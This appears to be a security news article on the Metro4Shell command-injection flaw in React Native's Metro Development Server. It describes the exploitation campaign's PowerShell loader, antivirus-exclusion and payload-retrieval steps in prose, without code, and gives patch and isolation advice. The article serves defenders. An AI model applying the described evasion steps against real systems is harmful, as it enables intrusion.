Key Points
- Critical vulnerability in React Native’s Metro Server exploited by hackers.
- Known as CVE-2025-11953, it allows remote code execution.
- Attacks target both Windows and Linux systems.
- Mitigation requires upgrading development tools.
Exploitation of React Native’s Vulnerability
Cyber attackers are actively leveraging a severe vulnerability found in the Metro Development Server, a core component of React Native’s development framework, to deploy sophisticated malware. This vulnerability, identified as CVE-2025-11953 and nicknamed “Metro4Shell,” was first detected by VulnCheck’s Canary honeypot network in late December 2025, with continued activity into early 2026. Despite its critical nature, it has received limited public attention.
The flaw affects the Metro Development Server included with the @react-native-community/cli npm package, a vital tool for developing React Native applications. It originates from the server’s default setting, which exposes an endpoint vulnerable to OS command injection, allowing attackers to execute arbitrary commands remotely.
Technical Details and Impact
Researchers from JFrog highlighted that this vulnerability stems from user-controlled input being passed to the unsafe open() function from the open npm package. This flaw permits unauthorized attackers to run arbitrary shell commands without authentication. On Windows, attackers can control command execution entirely, while on macOS and Linux, they can launch executables.
Despite the vulnerability’s high CVSS score of 9.8, indicative of its critical status, the Exploit Prediction Scoring System (EPSS) assigns it a low probability of exploitation, starkly contrasting with the observed reality of consistent attacks.
Attack Methodology and Response
VulnCheck’s analysis shows that these attacks are not exploratory but are part of a well-coordinated campaign. The attackers use a multi-stage PowerShell-based loader, initially encoded in Base64 to avoid detection, which then executes a sequence designed to bypass security measures and establish a persistent presence on the target system.
The attack sequence involves adding exclusions in Microsoft Defender for specific directories to avoid antivirus scanning, followed by establishing a TCP connection to retrieve further malicious payloads. The malware, found to be UPX-packed and Rust-based, is sophisticated enough to employ anti-analysis techniques, complicating static inspections.
Mitigation Strategies
Organizations utilizing React Native for development are urged to upgrade to @react-native-community/cli version 20.0.0 or later, as this version addresses the vulnerability. It is essential to treat development environments with the same security rigor as production systems, ensuring that Metro Development Servers are not exposed to untrusted networks and are isolated through network segmentation.
This vulnerability underscores the need for immediate action when vulnerabilities are identified, rather than waiting for official advisories or consensus. Developer tools are particularly attractive targets due to their widespread use and often lax security measures.
Conclusion
The exploitation of CVE-2025-11953 in React Native’s Metro Server exemplifies the urgent need for developers and organizations to stay ahead of threat actors by promptly implementing security patches and following best practices in network security.
